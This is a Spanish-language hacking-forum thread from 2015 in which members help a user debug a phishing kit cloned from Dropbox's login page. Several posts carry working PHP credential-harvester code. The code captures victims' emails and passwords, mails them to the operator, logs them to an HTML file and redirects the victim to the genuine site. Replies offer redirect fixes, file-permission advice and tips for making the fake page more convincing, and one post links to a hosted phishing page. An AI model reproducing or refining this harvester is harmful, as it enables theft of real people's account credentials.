[Problema] Phishing

Iniciado por neurotic, Mayo 13, 2015, 02:03:54 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1 2
Acciones del Usuario
Mayo 13, 2015, 02:03:54 PM Ultima modificación: Mayo 15, 2015, 10:23:21 AM por Expermicid
Gracias por el tuto

Una consulta... he hecho varios y no he tenido problemas, pero recientemente perdí el de dropbox y al hacerlo usando este método y un tuto que puso elshotta en este foro y en el finado master-hackers; el .php me guarda el pass pero no redirecciona, funciona con cualquiera pero no con el de drop.. He usados varios hosting y me sigue pasando

este es el php

Código: php
<?
/*
Este archivo es el que procesa todos los datos de la persona y lo guarda en un archivo (leeme.html <- Aqui se guardaran los datos).
*/

#haxor.php
// Asigna el valor a las variables del usuario y contraseña
$Email = $_POST['login_email'];
$email2=$_POST['lol'];
$Passwd = $_POST['login_password'];
//Asigna el valor a la variable donde se guarda el usuario y contraseña
$email="[email protected]";
      $headers = "From: $email";
      $message .= "

email: ".$Email." 
pass: " .$Passwd." 


___________________________________________________________________________________";

      $message = stripslashes($message);
      $message = strip_tags ($message);

mail($email2= "[email protected]", "Correo de hotmail", $message, $headers);

$guardame = fopen('leeme.html','a+');
fwrite($guardame,
"<br/><b>Usuario:</b>".$Email.
"<br/><b>Contrasena:</b>".$Passwd." ");

fclose($guardame);
//Redirecciona a la web original (facebook)
echo "<meta http-equiv='refresh' content='1;url=https://myaccount.google.com/?pli=1'>";
?>



Gracias de antemano


Saludos
Mayo 13, 2015, 02:53:46 PM #1
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Gracias por el tuto

Una consulta... he hecho varios y no he tenido problemas, pero recientemente perdí el de dropbox y al hacerlo usando este método y un tuto que puso elshotta en este foro y en el finado master-hackers; el .php me guarda el pass pero no redirecciona, funciona con cualquiera pero no con el de drop.. He usados varios hosting y me sigue pasando

este es el php

Código: php
<?
/*
Este archivo es el que procesa todos los datos de la persona y lo guarda en un archivo (leeme.html <- Aqui se guardaran los datos).
*/

#haxor.php
// Asigna el valor a las variables del usuario y contraseña
$Email = $_POST['login_email'];
$email2=$_POST['lol'];
$Passwd = $_POST['login_password'];
//Asigna el valor a la variable donde se guarda el usuario y contraseña
$email="[email protected]";
      $headers = "From: $email";
      $message .= "

email: ".$Email." 
pass: " .$Passwd." 


___________________________________________________________________________________";

      $message = stripslashes($message);
      $message = strip_tags ($message);

mail($email2= "[email protected]", "Correo de hotmail", $message, $headers);

$guardame = fopen('leeme.html','a+');
fwrite($guardame,
"<br/><b>Usuario:</b>".$Email.
"<br/><b>Contrasena:</b>".$Passwd." ");

fclose($guardame);
//Redirecciona a la web original (facebook)
echo "<meta http-equiv='refresh' content='1;url=https://myaccount.google.com/?pli=1'>";
?>



Gracias de antemano


Saludos

Prueba este codigo
Código: php
<?
/*
Este archivo es el que procesa todos los datos de la persona y lo guarda en un archivo (leeme.html <- Aqui se guardaran los datos).
*/

#haxor.php
// Asigna el valor a las variables del usuario y contraseña
$Email = $_POST['login_email'];
$email2=$_POST['lol'];
$Passwd = $_POST['login_password'];
//Asigna el valor a la variable donde se guarda el usuario y contraseña
$email="[email protected]";
      $headers = "From: $email";
      $message .= "

email: ".$Email." 
pass: " .$Passwd." 


___________________________________________________________________________________";

      $message = stripslashes($message);
      $message = strip_tags ($message);

mail($email2= "[email protected]", "Correo de hotmail", $message, $headers);

$guardame = fopen('leeme.html','a+');
fwrite($guardame,
"<br/><b>Usuario:</b>".$Email.
"<br/><b>Contrasena:</b>".$Passwd." ");

fclose($guardame);
//Redirecciona a la web original (facebook)
header('Location: https://www.facebook.com/');
?>
RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Mayo 13, 2015, 06:32:28 PM #2 Ultima modificación: Mayo 13, 2015, 06:35:46 PM por EPSILON
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta proba cambiando la ultima linea por:
Código: php
header('Location: http://www.site.com');
Saludos!
Mayo 13, 2015, 07:30:36 PM #3
Gracias por las respuestas...


es interesante porque no redirecciona, guarda las pass, pero se queda en la página del fake... pruebo con uno de gmail (que cambió el log esta semana) y con uno viejo de outlook... con esos si va


Saludos
Mayo 13, 2015, 08:45:45 PM #4
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta el code que te he puesto te deberia redireccionar a facebook y no a tu fake :)
RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Mayo 13, 2015, 09:57:39 PM #5
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta el code que te he puesto te deberia redireccionar a facebook y no a tu fake :)
entiendo, lo que pasa es que el fake no redirecciona... se queda sin hacer nada... lo extraño es que el pass si se guarda...


Saludos y nuevamente gracias
Mayo 13, 2015, 10:08:25 PM #6
Si quieres puedes pasar el link de tu fake y el code que tienes ahora mismo y le echo otro ojo ;)
RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Mayo 14, 2015, 05:49:59 AM #7
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
entiendo, lo que pasa es que el fake no redirecciona... se queda sin hacer nada... lo extraño es que el pass si se guarda...
Saludos y nuevamente gracias

Hola @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, he mirado tu código, lo he modificado y probado y funciona correctamente:

Código: php
    <?php
    /*
    Este archivo es el que procesa todos los datos de la persona y lo guarda en un archivo (leeme.html <- Aqui se guardaran los datos).
    */
     
    #haxor.php
    // Asigna el valor a las variables del usuario y contraseña
    $Email = $_GET['login_email'];
    $Passwd = $_GET['login_password'];
  

    //Asigna el valor a la variable donde se guarda el usuario y contraseña
    $email="[email protected]";
    $headers = "From: $email";
    $message = "mail: ".$Email." pass: " .$Passwd."___________________________________________________________________________________";
     
    $message = stripslashes($message);
    $message = strip_tags ($message);

    mail($email2= "[email protected]", "Correo de hotmail", $message, $headers);
     
    $guardame = fopen('leeme.html','a+');
    fwrite($guardame,"<br/><b>Usuario:</b>".$Email."<br/><b>Contrasena:</b>".$Passwd." ");
     
    fclose($guardame);
    //Redirecciona a la web original (facebook)
    header('Location: https://www.facebook.com/');
    ?>


Por cierto, comprueba que en ambos ficheros, tengas permisos 777.


Saludos.


Mayo 14, 2015, 10:04:23 AM #8
Gracias por las respuestas,

use el que pusiste blackdrake y además me aseguré que los permisos estuvieran aplicados.... no cambia el problema...  probé en unos 4 host gratuitos y solo con el de dropbox está fallando.....


Disculpas al compañero si le estoy cargando el tema

De nuevo gracias a todos


Saludos
Mayo 15, 2015, 04:51:35 AM #9
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Obviamente el código PHP está mal, enseñanoslo (el que tienes actualmente y te falla) porque hay algo que no has hecho bien.

Saludos.


Mayo 15, 2015, 05:32:39 PM #10 Ultima modificación: Mayo 16, 2015, 08:47:22 AM por blackdrake
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Obviamente el código PHP está mal, enseñanoslo (el que tienes actualmente y te falla) porque hay algo que no has hecho bien.

Saludos.

Gracias por la respuesta y por dividir el tema para no cargarme el del compañero....


Código: php
<?
/*
Este archivo es el que procesa todos los datos de la persona y lo guarda en un archivo (leeme.html <- Aqui se guardaran los datos).
*/
 
#haxor.php
// Asigna el valor a las variables del usuario y contraseña
$Email = $_POST['login_email'];
$email2=$_POST['lol'];
$Passwd = $_POST['login_password'];
//Asigna el valor a la variable donde se guarda el usuario y contraseña
$email="[email protected]";
      $headers = "From: $email";
      $message .= "
 
email: ".$Email." 
pass: " .$Passwd." 
 
 
___________________________________________________________________________________";
 
      $message = stripslashes($message);
      $message = strip_tags ($message);
 
mail($email2= "[email protected]", "Correo de hotmail", $message, $headers);
 
$guardame = fopen('leeme.html','a+');
fwrite($guardame,
"<br/><b>Usuario:</b>".$Email.
"<br/><b>Contrasena:</b>".$Passwd." ");
 
fclose($guardame);
//Redirecciona a la web original (facebook)
echo "<meta http-equiv='refresh' content='1;url=https://myaccount.google.com/?pli=1'>";
?>


ese php me ha funcionado para el mismo dropbox y gmail con pequeñas variaciones, en drop hice lo usual, el guarda el pass pero no redirecciona.. no he tenido tiempo pero voy a intentar con la recomendación del compañero ROLLTH, de iponer en práctica lo expuesto en el taller de xss... 

para salir del paso modifiqué uno de la red (mis disculpas al usuario que lo posteó pero no anoté el nombre) y lo hice de drop por si lo quieren ojear

CitarNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Saludos
Mayo 16, 2015, 08:52:08 AM #11
Hola @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

He descargado tus archivos, y me ha funcionado correctamente, acuérdate de que el archivo restar.html debe estar creado, y darle 777 a sumando.php, guarda los datos y redirige correctamente.

Un consejo, los phishing se toman basándose en los css de la página original, no en una imagen.

saludos.


Mayo 16, 2015, 01:12:19 PM #12
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

He descargado tus archivos, y me ha funcionado correctamente, acuérdate de que el archivo restar.html debe estar creado, y darle 777 a sumando.php, guarda los datos y redirige correctamente.

Un consejo, los phishing se toman basándose en los css de la página original, no en una imagen.

saludos.
ese es otro, con ese no tengo problema, lo puse como ejemplo de uno que uso momentáneamente... con el que tengo problemas es si lo bajo de
Código: php
dropbox.com
le cambio los action y algunos href, luego pequeños cambios al css.... algo le agregaron que no permite redirección


Saludos
Mayo 16, 2015, 01:14:39 PM #13 Ultima modificación: Mayo 16, 2015, 01:19:41 PM por Jimeno
WTF!
Añade al PRINCIPIO de tu código php al que se redirecciona tras el envío del formulario esto
Código: php
<?php
        header('Location: https://webalaquerediriges.com/');
?>
Contacto: @migueljimeno96 -
Mayo 16, 2015, 02:55:58 PM #14
Jimeno... ya se hizo y no cambia en nada... he probado en tres host gratuitos y como dije, guarda la clave pero no redirecciona... aclaro que no es el que subí a meiafire, ese funciona y es algo cutre... mi lucha está con el original de la página... la otra es que luego con tiempo intento implementar algo de lo expuesto den el taller de xss

Saludos
Mayo 16, 2015, 03:03:14 PM #15
Publica tu código actual entonces
Con un header que cambie la cabecera Location debe bastar, algo estarás haciendo mal. Porque los hostings en principio permiten redireccionar fuera de ellos.
Si no todo es probar, este caso con JS al inicio del documento:
Código: html5
<script type="text/javascript">document.location='https://web.com/';</script>
Contacto: @migueljimeno96 -
Mayo 16, 2015, 03:31:51 PM #16
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Es obvio que algo está haciendo mal, pero @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta no quiere subir su código, encima sube otros que funcionan, y solo nos está haciendo perder el tiempo.

O subes el código para que te ayudemos, o si no, no podremos hacer nada por ti.

Saludos.


Mayo 16, 2015, 04:32:50 PM #17 Ultima modificación: Mayo 16, 2015, 04:57:25 PM por neurotic66
ya lo había borrado, la intención no es molestar a nadie...  cambié los action por
Código: php
login.php
(usualmente uso el que puse con el cambio de agregar el header... en el action estaba originalmente
Código: php
/ajax_verify_code
... voy a subir uno rápido que descargué de la web original, usualmente bajo todos los archivos (me funcionaba hace dos semanas) quito algunos href y a los css le quito cosas simples y en algunos casos los he dejado como están...

este es el login actual de drop con el cambio del action

CitarNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta

edit. cuando subo habilito los permisos al archivo y la carpeta, agrego header al php. El php que puse en el primer mensaje antes me funcionaba sin ningún problema.

ejemplo arriba
Código: php
http://titlelepaz.herobo.com/Dropbox%20-%20Sign%20in.html


Nota: no he podido probar con el script  de @jimeno porque los server que uso están caido o en mantenimiento (es la única recomendación que me falta implementar)

Saludos
Mayo 16, 2015, 05:29:26 PM #18
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

lo que queremos ver es el php no el html...

Saludos.


Mayo 17, 2015, 12:43:50 AM #19
supongo que al php te refieres al
Código: php
login.php
que uso, que es el que puse arriba, porque si no evidentemente estoy perdido y no es por molestar

Código: php
<?
/*
Este archivo es el que procesa todos los datos de la persona y lo guarda en un archivo (leeme.html <- Aqui se guardaran los datos).
*/
 
#haxor.php
// Asigna el valor a las variables del usuario y contraseña
$Email = $_POST['login_email'];
$email2=$_POST['lol'];
$Passwd = $_POST['login_password'];
//Asigna el valor a la variable donde se guarda el usuario y contraseña
$email="[email protected]";
      $headers = "From: $email";
      $message .= "
 
email: ".$Email." 
pass: " .$Passwd." 
 
 
___________________________________________________________________________________";
 
      $message = stripslashes($message);
      $message = strip_tags ($message);
 
mail($email2= "[email protected]", "Correo de hotmail", $message, $headers);
 
$guardame = fopen('leeme.html','a+');
fwrite($guardame,
"<br/><b>Usuario:</b>".$Email.
"<br/><b>Contrasena:</b>".$Passwd." ");
 
fclose($guardame);
//Redirecciona a la web original (facebook)
echo "<meta http-equiv='refresh' content='1;url=https://dropbox.com'>";
?>
el único cambio es el header y que redirecciona a "x" carpeta de dropbox para que sea más creíble.... todos los permisos otrogados y funcionaba hace dos semanas exactamente ese mismo... el html, la carpeta de los files y ese php es todo lo que subo, si se me escapa algo les agradezco el señalamiento


Gracias y saludos
Imprimir
Ir Arriba Páginas1 2
Acciones del Usuario